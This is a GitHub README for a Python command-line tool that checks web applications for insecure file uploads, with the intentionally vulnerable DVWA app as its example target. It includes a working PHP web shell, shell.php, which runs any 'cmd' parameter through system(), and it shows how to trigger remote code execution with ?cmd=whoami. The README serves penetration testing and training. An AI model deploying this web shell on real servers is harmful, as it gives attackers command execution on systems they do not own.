Skip to content

sideEffect7/Upload-file-vuln-tester

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

4 Commits
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

File Upload Vulnerability Tester (CLI Tool)

πŸ“ Overview

This is a simple yet effective CLI tool built in Python to detect insecure file upload vulnerabilities in web applications. It simulates the upload of a payload (like shell.php) to a target URL and checks if the file is accessible and potentially executable.

Useful for:

  • Bug bounty hunters
  • Web application testers
  • CTF learners
  • Anyone practicing ethical hacking

πŸ“ Repository Structure

file-upload-vuln-tester/
β”œβ”€β”€ upload_tester.py          # Main CLI tool
β”œβ”€β”€ shell.php                 # Sample test payload
β”œβ”€β”€ requirements.txt          # Required Python packages
β”œβ”€β”€ README.md                 # Project documentation
β”œβ”€β”€ screenshots/              # Proof of exploitation
β”‚   β”œβ”€β”€ tool_run.png
β”‚   β”œβ”€β”€ browser_rce.png
β”‚   └── dvwa_form.png

βš™οΈ Requirements

  • Python 3.x
  • requests

Install dependencies:

pip install -r requirements.txt

πŸš€ Usage

python3 upload_tester.py <upload_url> <file_path> --base <base_url>

Example:

python3 upload_tester.py http://localhost/DVWA/vulnerabilities/upload/ shell.php --base http://localhost/DVWA/hackable/

🧠 How It Works

  1. Sends a POST request with a test file
  2. Checks common upload folders for the file (uploads/, files/, etc.)
  3. Verifies file access and optional RCE using ?cmd=whoami

πŸ” Sample Payload (shell.php)

<?php
if(isset($_REQUEST['cmd'])){
  system($_REQUEST['cmd']);
}
?>

Upload this to simulate a remote shell

πŸ’‘ Why This Project?

  • Helps automate a real-world vulnerability test
  • Trains for bug bounty methodology
  • Demonstrates scripting and scanning skills

πŸ›‘οΈ Disclaimer

This tool is for educational and ethical testing only. Do not use it on systems you do not own or have explicit permission to test.

πŸ‘¨β€πŸ’» Author

[Your Name Here] Feel free to connect with me on LinkedIn or contribute to the tool!

πŸ“œ License

MIT License

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published